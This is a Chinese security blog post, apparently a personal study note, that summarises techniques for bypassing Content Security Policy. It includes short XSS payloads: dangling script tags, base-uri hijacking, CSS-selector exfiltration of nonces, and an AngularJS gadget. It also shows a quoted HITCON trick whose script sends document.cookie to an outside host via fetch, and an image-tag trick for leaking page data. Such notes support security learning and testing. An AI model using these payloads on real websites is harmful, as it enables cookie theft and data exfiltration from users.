<!DOCTYPE html>
<html lang="">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5/css/all.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/pace-js@1/themes/blue/pace-theme-minimal.css">
  <script src="//cdn.jsdelivr.net/npm/pace-js@1/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"blog.wendell.pro","root":"/","scheme":"Mist","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"always","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="简介内容安全策略,https:&#x2F;&#x2F;developer.mozilla.org&#x2F;zh-CN&#x2F;docs&#x2F;Web&#x2F;HTTP&#x2F;CSP,提供xss攻击的保护 服务器返回的http中带着 Content-Security-Policy HTTP头部 ,或者html页面中带着 1&lt;meta http-equiv&#x3D;&quot;Content-Security-Policy&quot; conten">
<meta property="og:type" content="article">
<meta property="og:title" content="csp_绕过_总结.md">
<meta property="og:url" content="http://blog.wendell.pro/2021/01/19/csp-%E7%BB%95%E8%BF%87-%E6%80%BB%E7%BB%93-md/index.html">
<meta property="og:site_name" content="Wendell&#39;s blog">
<meta property="og:description" content="简介内容安全策略,https:&#x2F;&#x2F;developer.mozilla.org&#x2F;zh-CN&#x2F;docs&#x2F;Web&#x2F;HTTP&#x2F;CSP,提供xss攻击的保护 服务器返回的http中带着 Content-Security-Policy HTTP头部 ,或者html页面中带着 1&lt;meta http-equiv&#x3D;&quot;Content-Security-Policy&quot; conten">
<meta property="og:locale">
<meta property="article:published_time" content="2021-01-19T07:01:00.000Z">
<meta property="article:modified_time" content="2021-02-25T07:17:24.656Z">
<meta property="article:author" content="Wendell">
<meta property="article:tag" content="前端安全">
<meta property="article:tag" content="csp绕过">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://blog.wendell.pro/2021/01/19/csp-%E7%BB%95%E8%BF%87-%E6%80%BB%E7%BB%93-md/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'default'
  };
</script>

  <title>csp_绕过_总结.md | Wendell's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/atom.xml" title="Wendell's blog" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Wendell's blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="default">
    <link itemprop="mainEntityOfPage" href="http://blog.wendell.pro/2021/01/19/csp-%E7%BB%95%E8%BF%87-%E6%80%BB%E7%BB%93-md/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/avatar.jpg">
      <meta itemprop="name" content="Wendell">
      <meta itemprop="description" content="Wendell blog">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Wendell's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          csp_绕过_总结.md
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2021-01-19 15:01:00" itemprop="dateCreated datePublished" datetime="2021-01-19T15:01:00+08:00">2021-01-19</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2021-02-25 15:17:24" itemprop="dateModified" datetime="2021-02-25T15:17:24+08:00">2021-02-25</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E5%89%8D%E7%AB%AF%E5%AE%89%E5%85%A8/" itemprop="url" rel="index"><span itemprop="name">前端安全</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="Views" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">Views: </span>
              <span id="busuanzi_value_page_pv"></span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h2><p>内容安全策略,<a target="_blank" rel="noopener" href="https://developer.mozilla.org/zh-CN/docs/Web/HTTP/CSP,%E6%8F%90%E4%BE%9Bxss%E6%94%BB%E5%87%BB%E7%9A%84%E4%BF%9D%E6%8A%A4">https://developer.mozilla.org/zh-CN/docs/Web/HTTP/CSP,提供xss攻击的保护</a></p>
<p>服务器返回的http中带着 <a target="_blank" rel="noopener" href="https://developer.mozilla.org/zh-CN/docs/Web/HTTP/Headers/Content-Security-Policy"><code>Content-Security-Policy</code></a> HTTP头部 ,或者html页面中带着</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;meta http-equiv&#x3D;&quot;Content-Security-Policy&quot; content&#x3D;&quot;default-src &#39;self&#39;; img-src https:&#x2F;&#x2F;*; child-src &#39;none&#39;;&quot;&gt;</span><br></pre></td></tr></table></figure>
<p>csp策略主要指定跨域内嵌资源如script,img的访问策略</p>
<p>其中iframe的策略也可以由x-frame-options头指定</p>
<a id="more"></a>
<h2 id="绕过方法"><a href="#绕过方法" class="headerlink" title="绕过方法"></a>绕过方法</h2><p>可以使用CSP Evaluator进行检测</p>
<p>我们一般关注script的设置</p>
<h3 id="配置不严格导致绕过"><a href="#配置不严格导致绕过" class="headerlink" title="配置不严格导致绕过"></a>配置不严格导致绕过</h3><h4 id="有可利用的302跳转"><a href="#有可利用的302跳转" class="headerlink" title="有可利用的302跳转"></a>有可利用的302跳转</h4><p>如果csp策略为</p>
<p>Content-Security-Policy: default-src ‘self’;script-src <a target="_blank" rel="noopener" href="http://127.0.0.1/a/">http://127.0.0.1/a/</a> ;</p>
<p>如果a目录下有一个302跳转,则可以加载src同域名的其他目录的脚本,这个是一个很奇怪的特性</p>
<p>比如csp策略是这样的,q目录下有一个任意302跳转</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">header(&quot;Content-Security-Policy: default-src &#39;self&#39;;script-src http:&#x2F;&#x2F;www.baidu.com&#x2F;c&#x2F; http:&#x2F;&#x2F;127.0.0.1:7000&#x2F;q&#x2F;; &quot;);?&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>则可以加载<a target="_blank" rel="noopener" href="http://www.baidu.com/%E6%88%96%E8%80%85http://127.0.0.1:7000/%E4%B8%8B%E7%9A%84%E4%BB%BB%E6%84%8F%E8%84%9A%E6%9C%AC,%E5%BF%BD%E7%95%A5%E7%9A%84c%E5%92%8Cq%E7%9A%84%E7%9B%AE%E5%BD%95%E9%99%90%E5%88%B6,%E4%BD%86%E6%98%AF%E4%B8%8D%E8%83%BD%E5%8A%A0%E8%BD%BD%E5%85%B6%E4%BB%96%E5%9F%9F,%E6%AF%94%E5%A6%82www.google.com%E5%B0%B1%E4%B8%8D%E5%8F%AF%E4%BB%A5%E5%88%A9%E7%94%A8302%E8%B7%B3%E8%BD%AC%E5%8A%A0%E8%BD%BD">http://www.baidu.com/或者http://127.0.0.1:7000/下的任意脚本,忽略的c和q的目录限制,但是不能加载其他域,比如www.google.com就不可以利用302跳转加载</a></p>
<h4 id="unsafe-inline"><a href="#unsafe-inline" class="headerlink" title="unsafe-inline"></a>unsafe-inline</h4><p>如果有script开启了unsafe-inline,那就可以直接行内执行js</p>
<h4 id="object-src"><a href="#object-src" class="headerlink" title="object-src"></a>object-src</h4><p>如果object-src限制不严格,可以利用pdf执行javascript,但是这个有限制,不能弹cookie</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;embed width&#x3D;&quot;100%&quot; height&#x3D;&quot;100%&quot; src&#x3D;&quot;&#x2F;&#x2F;ip&#x2F;evil.pdf&quot;&gt;&lt;&#x2F;embed&gt;</span><br></pre></td></tr></table></figure>
<p>生成恶意的pdf文件<a target="_blank" rel="noopener" href="https://blog.csdn.net/microzone/article/details/52850623">https://blog.csdn.net/microzone/article/details/52850623</a></p>
<h3 id="绕过csp设置"><a href="#绕过csp设置" class="headerlink" title="绕过csp设置"></a>绕过csp设置</h3><p>csp策略是基于单个html页面的,策略来自http头或者meta标签,而同源页面之间是可以相互操控dom的,这个不受csp的限制</p>
<h4 id="利用同源页面"><a href="#利用同源页面" class="headerlink" title="利用同源页面"></a>利用同源页面</h4><p>如果有A,B两个同源页面,A配置了csp,B没有配置,则可以利用没有配置的B,xss漏洞操控A的dom进行攻击</p>
<p>如果Web构建为nginx+Django,csp策略的配置来自Django的中间件,则nginx直接返回的静态文件,就没有csp配置的</p>
<p>实际情况可能更加复杂,比如有一个受限的xss点,没有(),并且有csp限制,则可以写入a标签,然后利用`执行打开新的没有csp的同源窗口,在向dom写入script ,绕过xss执行的受限</p>
<h4 id="利用其他漏洞改掉配置信息"><a href="#利用其他漏洞改掉配置信息" class="headerlink" title="利用其他漏洞改掉配置信息"></a>利用其他漏洞改掉配置信息</h4><p>csp的配置来自http请求头,如果网站有CRLF注入,则可以把csp挤入请求体,让csp直接无效</p>
<p>参考</p>
<p><a target="_blank" rel="noopener" href="https://github.com/Lou00/HCTF2018_Bottle">https://github.com/Lou00/HCTF2018_Bottle</a></p>
<h3 id="script-src的几个绕过姿势"><a href="#script-src的几个绕过姿势" class="headerlink" title="script-src的几个绕过姿势"></a>script-src的几个绕过姿势</h3><h4 id="script-src-nonce"><a href="#script-src-nonce" class="headerlink" title="script-src nonce"></a>script-src nonce</h4><p>如果script-src 配置了nonce</p>
<h5 id="利用base-url"><a href="#利用base-url" class="headerlink" title="利用base-url"></a>利用base-url</h5><p>如果csp策略为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">default-src &#39;self&#39;; script-src &#39;nonce-test</span><br></pre></td></tr></table></figure>
<p>没有特意配置base-uri为none,并且可控输入点之下有,script标签,例如场景如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">    &lt;title&gt;CSP Test&lt;&#x2F;title&gt;</span><br><span class="line">&lt;&#x2F;head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;?php</span><br><span class="line">    if (isset($_GET[&#39;w&#39;])) &#123;</span><br><span class="line">        echo &quot;Your GET content:&quot;.@$_GET[&#39;w&#39;];</span><br><span class="line">    &#125;&#x2F;&#x2F;</span><br><span class="line">?&gt;</span><br><span class="line">&lt;xxx&gt;&lt;&#x2F;xxx&gt;</span><br><span class="line">&lt;script src&#x3D;&#39;a.js&#39; nonce&#x3D;&#39;secret&#39;&gt;</span><br><span class="line">    &#x2F;&#x2F;do some thing</span><br><span class="line">&lt;&#x2F;script&gt;</span><br><span class="line">&lt;&#x2F;body&gt;</span><br></pre></td></tr></table></figure>
<p>则可以通过指定base为自己的服务器,并且 在根目录a.js写入恶意payload,进行攻击</p>
<h5 id="不完整的script"><a href="#不完整的script" class="headerlink" title="不完整的script"></a>不完整的script</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">    &lt;title&gt;CSP Test&lt;&#x2F;title&gt;</span><br><span class="line">&lt;&#x2F;head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;?php</span><br><span class="line">    if (isset($_GET[&#39;w&#39;])) &#123;</span><br><span class="line">        echo &quot;Your GET content:&quot;.@$_GET[&#39;w&#39;];</span><br><span class="line">    &#125;&#x2F;&#x2F;</span><br><span class="line">?&gt;</span><br><span class="line">&lt;script src&#x3D;&#39;a.js&#39; nonce&#x3D;&#39;secret&#39;&gt;</span><br><span class="line">    &#x2F;&#x2F;do some thing</span><br><span class="line">&lt;&#x2F;script&gt;</span><br><span class="line">&lt;&#x2F;body&gt;</span><br></pre></td></tr></table></figure>
<p>如果一个输出点,恰好在用于nonce的前方,</p>
<p>则可以输入进入绕过</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script src&#x3D;&#x2F;&#x2F;ip&#x2F;a.js a&#x3D;</span><br></pre></td></tr></table></figure>
<p>因为输入缺失&gt;,所以浏览器会向后,找到第一个&gt;并且把中间的字符作为a的属性值,这样攻击者插入的script就拥有了一个nonce,从而被加载执行.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;script src&#x3D;&#x2F;&#x2F;ip&#x2F;a.js a&#x3D;</span><br><span class="line">&lt;script src&#x3D;&#39;a.js&#39; nonce&#x3D;&#39;secret&#39;&gt;</span><br></pre></td></tr></table></figure>
<h5 id="静态的dom-xss"><a href="#静态的dom-xss" class="headerlink" title="静态的dom xss"></a>静态的dom xss</h5><p>如果被攻击的站点存在一个纯静态的dom xss,也可以被攻击</p>
<p>参考</p>
<p><a target="_blank" rel="noopener" href="http://sirdarckcat.blogspot.jp/2016/12/how-to-bypass-csp-nonces-with-dom-xss.html">http://sirdarckcat.blogspot.jp/2016/12/how-to-bypass-csp-nonces-with-dom-xss.html</a></p>
<p>中文版:<a target="_blank" rel="noopener" href="https://paper.seebug.org/166/">https://paper.seebug.org/166/</a></p>
<p>三个静态dom的例子:</p>
<ol>
<li>持久型 DOM XSS，当攻击者可以强制将页面跳转至易受攻击的页面，并且 payload 不包括在缓存的响应中（需要提取）。</li>
<li>包含<strong>第三方 HTML 代码</strong>的 DOM XSS 漏洞（例如，fetch(location.pathName).then(r=&gt;r.text()).then(t=&gt;body.innerHTML=t);）</li>
<li>XSS payload 存在于 <code>location.hash</code> 中的 DOM XSS 漏洞（例如 <code>https://victim/xss#!foo?payload=</code>）</li>
</ol>
<p>如果目标站点存在纯静态的dom xss,并且目标网站开启了缓存,</p>
<p>因为location.hash的改变,并不会让浏览器更新缓存,可以通过dom xss,先利用css选择器窃取nonce数据,然后插入带有nonce的script标签,造成js代码执行.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">*[attribute^&#x3D;&quot;a&quot;]&#123;background:url(&quot;record?match&#x3D;a&quot;)&#125;</span><br><span class="line">*[attribute^&#x3D;&quot;b&quot;]&#123;background:url(&quot;record?match&#x3D;b&quot;)&#125;</span><br><span class="line">*[attribute^&#x3D;&quot;c&quot;]&#123;background:url(&quot;record?match&#x3D;c&quot;)&#125;</span><br><span class="line">[...]</span><br></pre></td></tr></table></figure>


<h4 id="script-src-self"><a href="#script-src-self" class="headerlink" title="script-src:self"></a>script-src:self</h4><h5 id="host-JSONP"><a href="#host-JSONP" class="headerlink" title="host JSONP"></a>host JSONP</h5><p>如果script允许的源存在jsonp,直接引入,导致js执行</p>
<h5 id="user-uploaded-files"><a href="#user-uploaded-files" class="headerlink" title="user uploaded files."></a>user uploaded files.</h5><p>上传文件,上传后恶意js后,加载同样可以绕过</p>
<p>也可以上传svg可以直接在里面插入script执行</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;svg xmlns&#x3D;&quot;http:&#x2F;&#x2F;www.w3.org&#x2F;2000&#x2F;svg&quot; onload&#x3D;&quot;alert(URL)&quot;&#x2F;&gt;</span><br></pre></td></tr></table></figure>
<p>,同样的还有HITCON 2020的一个trick ,在apache下上传var文件</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">Content-language: en</span><br><span class="line">Content-type: text&#x2F;html</span><br><span class="line">Body:----foo----</span><br><span class="line"></span><br><span class="line">&lt;script&gt;</span><br><span class="line">fetch(&#39;hxxp:&#x2F;&#x2F;orange.tw&#x2F;?&#39; + escape(document.cookie))</span><br><span class="line">&lt;&#x2F;script&gt;</span><br><span class="line"></span><br><span class="line">----foo---</span><br></pre></td></tr></table></figure>


<h4 id="利用script-gadgets"><a href="#利用script-gadgets" class="headerlink" title="利用script gadgets"></a>利用script gadgets</h4><p>参照谷歌2017 Blackhat的议题,利用一些框架的特殊标签,直接执行代码,</p>
<p>利用条件一般为页面引入了这些js框架,或者设置了一下cdn为可信源,攻击者通过cdn引入这些框架,如<a target="_blank" rel="noopener" href="https://paper.seebug.org/855/%E4%B8%AD%E7%9A%84,%E9%85%8D%E7%BD%AE%E4%BA%86cdnjs.cloudflare.com%E4%B8%BA%E5%8F%AF%E4%BF%A1%E6%BA%90,%E5%88%A9%E7%94%A8cdn%E5%BC%95%E5%85%A5angular,%E7%9B%B4%E6%8E%A5%E6%89%A7%E8%A1%8C">https://paper.seebug.org/855/中的,配置了cdnjs.cloudflare.com为可信源,利用cdn引入angular,直接执行</a></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;script src&#x3D;https:&#x2F;&#x2F;cdnjs.cloudflare.com&#x2F;ajax&#x2F;libs&#x2F;angular.js&#x2F;1.0.8&#x2F;angular.min.js&gt;</span><br><span class="line">&lt;&#x2F;script&gt;</span><br><span class="line">&lt;div ng-app&gt;</span><br><span class="line">    &#123;&#123;constructor.constructor(&#39;alert(document.cookie)&#39;)()&#125;&#125;</span><br><span class="line">&lt;&#x2F;div&gt;</span><br></pre></td></tr></table></figure>


<p><a target="_blank" rel="noopener" href="https://www.blackhat.com/docs/us-17/thursday/us-17-Lekies-Dont-Trust-The-DOM-Bypassing-XSS-Mitigations-Via-Script-Gadgets.pdf">https://www.blackhat.com/docs/us-17/thursday/us-17-Lekies-Dont-Trust-The-DOM-Bypassing-XSS-Mitigations-Via-Script-Gadgets.pdf</a></p>
<p>这里是可利用的框架列表</p>
<p><a target="_blank" rel="noopener" href="https://github.com/google/security-research-pocs/blob/master/script-gadgets/bypasses.md">https://github.com/google/security-research-pocs/blob/master/script-gadgets/bypasses.md</a></p>
<h2 id="数据带外的方法"><a href="#数据带外的方法" class="headerlink" title="数据带外的方法"></a>数据带外的方法</h2><ul>
<li><p>利用location跳转数据带外</p>
</li>
<li><p>windwo.open可以直接数据带外</p>
</li>
<li><p>利用link标签带外</p>
<p>这个比较老了,比较新版的浏览器已经不可以了</p>
</li>
</ul>
<h2 id="数据窃取的姿势"><a href="#数据窃取的姿势" class="headerlink" title="数据窃取的姿势"></a>数据窃取的姿势</h2><h4 id="利用css"><a href="#利用css" class="headerlink" title="利用css"></a>利用css</h4><p>利用css选择器匹配属性,如果匹配到了会发送请求,多次匹配然后窃取数据</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">*[attribute^&#x3D;&quot;a&quot;]&#123;background:url(&quot;record?match&#x3D;a&quot;)&#125;</span><br><span class="line">*[attribute^&#x3D;&quot;b&quot;]&#123;background:url(&quot;record?match&#x3D;b&quot;)&#125;</span><br><span class="line">*[attribute^&#x3D;&quot;c&quot;]&#123;background:url(&quot;record?match&#x3D;c&quot;)&#125;</span><br><span class="line">[...]</span><br></pre></td></tr></table></figure>
<h4 id="利用不完全的标签"><a href="#利用不完全的标签" class="headerlink" title="利用不完全的标签"></a>利用不完全的标签</h4><p>如果csp配置了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">header(&quot;Content-Security-Policy: default-src &#39;self&#39;;script-src &#39;self&#39;; img-src *;</span><br></pre></td></tr></table></figure>
<p>imgsrc为*</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    if (isset($_GET[&#39;cl4y&#39;])) &#123;</span><br><span class="line">        echo &quot;Your GET content:&quot;.@$_GET[&#39;w&#39;];</span><br><span class="line">    &#125;&#x2F;&#x2F;</span><br><span class="line">?&gt;</span><br><span class="line">&lt;h1&gt;flag&#123;serct&#125;&lt;&#x2F;h1&gt;</span><br><span class="line">&lt;h2 id&#x3D;&quot;id&quot;&gt;3&lt;&#x2F;h2&gt;</span><br></pre></td></tr></table></figure>
<p>则可以通过插入&lt;img src=//ip/</p>
<p>而窃取数据</p>

    </div>

    
    
    
        

  <div class="followme">
    <p>Welcome to my other publishing channels</p>

    <div class="social-list">

        <div class="social-item">
          <a target="_blank" class="social-link" href="/atom.xml">
            <span class="icon">
              <i class="fa fa-rss"></i>
            </span>

            <span class="label">RSS</span>
          </a>
        </div>
    </div>
  </div>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E5%89%8D%E7%AB%AF%E5%AE%89%E5%85%A8/" rel="tag"># 前端安全</a>
              <a href="/tags/csp%E7%BB%95%E8%BF%87/" rel="tag"># csp绕过</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/01/18/pythonn-%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8-%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/" rel="prev" title="python_沙箱逃逸_绕过总结">
      <i class="fa fa-chevron-left"></i> python_沙箱逃逸_绕过总结
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/01/25/ssrf-%E6%80%BB%E7%BB%93-md-1/" rel="next" title="ssrf_总结.md">
      ssrf_总结.md <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AE%80%E4%BB%8B"><span class="nav-number">1.</span> <span class="nav-text">简介</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%BB%95%E8%BF%87%E6%96%B9%E6%B3%95"><span class="nav-number">2.</span> <span class="nav-text">绕过方法</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%85%8D%E7%BD%AE%E4%B8%8D%E4%B8%A5%E6%A0%BC%E5%AF%BC%E8%87%B4%E7%BB%95%E8%BF%87"><span class="nav-number">2.1.</span> <span class="nav-text">配置不严格导致绕过</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%9C%89%E5%8F%AF%E5%88%A9%E7%94%A8%E7%9A%84302%E8%B7%B3%E8%BD%AC"><span class="nav-number">2.1.1.</span> <span class="nav-text">有可利用的302跳转</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#unsafe-inline"><span class="nav-number">2.1.2.</span> <span class="nav-text">unsafe-inline</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#object-src"><span class="nav-number">2.1.3.</span> <span class="nav-text">object-src</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%BB%95%E8%BF%87csp%E8%AE%BE%E7%BD%AE"><span class="nav-number">2.2.</span> <span class="nav-text">绕过csp设置</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E5%90%8C%E6%BA%90%E9%A1%B5%E9%9D%A2"><span class="nav-number">2.2.1.</span> <span class="nav-text">利用同源页面</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E5%85%B6%E4%BB%96%E6%BC%8F%E6%B4%9E%E6%94%B9%E6%8E%89%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF"><span class="nav-number">2.2.2.</span> <span class="nav-text">利用其他漏洞改掉配置信息</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#script-src%E7%9A%84%E5%87%A0%E4%B8%AA%E7%BB%95%E8%BF%87%E5%A7%BF%E5%8A%BF"><span class="nav-number">2.3.</span> <span class="nav-text">script-src的几个绕过姿势</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#script-src-nonce"><span class="nav-number">2.3.1.</span> <span class="nav-text">script-src 